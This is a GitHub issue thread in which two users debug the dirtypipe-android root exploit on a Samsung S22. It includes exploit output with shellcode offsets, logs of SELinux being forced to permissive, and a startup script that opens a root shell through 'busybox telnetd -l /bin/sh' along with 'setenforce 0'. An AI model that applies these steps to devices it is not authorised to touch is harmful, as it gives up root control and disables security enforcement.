first instruction has an unexpected value. It means different compiler option was used for S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

elliwigy commented 2 years ago

You missed debug1. But I found the problem in your log on debug2.

first instruction has an unexpected value. It means different compiler option was used for S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

Sure...

/system/lib64/libc++.so

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post output of run.bat.

elliwigy commented 2 years ago

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post output of run.bat.

dirtypipe-android: 1 file pushed, 0 skipped. 4.2 MB/s (45296 bytes in 0.010s) startup-root: 1 file pushed, 0 skipped. 3.7 MB/s (3671 bytes in 0.001s) magisk/busybox: 1 file pushed, 0 skipped. 68.7 MB/s (2102536 bytes in 0.029s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 59.2 MB/s (672928 bytes in 0.011s) 4 files pushed, 0 skipped. 35.3 MB/s (2824431 bytes in 0.076s) Failed to set property 'a' to 'a'. See dmesg for error reason. Ignore device info. Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys stage1_lib: /system/lib64/libc++.so stage2_lib: /system/lib64/libldacBT_enc.so stage2_param_libname: /vendor/lib/libcamxifestriping.so d503233f PACIASP was found. Offset hook address by +4. Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd Empty space size: 2096 bytes Run index: 0 Stage1 debug filename: /dev/.dirtypipe-0000 Shell code size: 344 0x158 bytes It worked!

polygraphene commented 2 years ago

Did the device reboot? How about adb logcat?

elliwigy commented 2 years ago

second time I ran it it said press any key to continue then crashed but first time through didn't say press any key to continue but didn't crash either

polygraphene commented 2 years ago

That seems good sign. Run adb shell, then logcat -d | grep modprobe and logcat -d | grep libc

elliwigy commented 2 years ago

logcat.txt logcat2.txt

polygraphene commented 2 years ago

Seems succeeded. Didn't you get root shell?

03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:267): avc:  denied  { read open } for  pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
elliwigy commented 2 years ago

Nope, unless I am doing something wrong.. I double click the run.bat and it runs up to saying "It worked!" then just sits there.. then if I run it a second time it crashes.

elliwigy commented 2 years ago

This time I ran it the first time said it worked then pressed enter and it said press any key to continue then AUTH but the terminal just closed and nothing happened.

polygraphene commented 2 years ago

So, add following 3 lines in startup-root then retry:

HOST=127.0.0.1
PORT=10847

logwrapper echo startup-root ok
logwrapper id
/data/local/tmp/busybox telnetd -l /bin/sh -p 10848 &

export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art

Then try /data/local/tmp/busybox telnet 127.0.0.1 10848 on adb shell. And upload logcat again.

elliwigy commented 2 years ago

logcat3.txt

elliwigy commented 2 years ago

I added the 3 lines and ran the run.bat then adb shell and the telnet command keeps returning connection refused

polygraphene commented 2 years ago

Did you launch run.bat after editing startup-root?

elliwigy commented 2 years ago

Did you launch run.bat after editing startup-root?

Yes lol

elliwigy commented 2 years ago

startup-root.txt

did I edit it right? just remove the .txt file extension

polygraphene commented 2 years ago

Yes. That's right. I could not find any clue on logcat3.txt. Can you reboot the device and retry?

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta3.zip

I added more log and setenforce 0 on startup-root. Try it. You don't need to edit startup-root.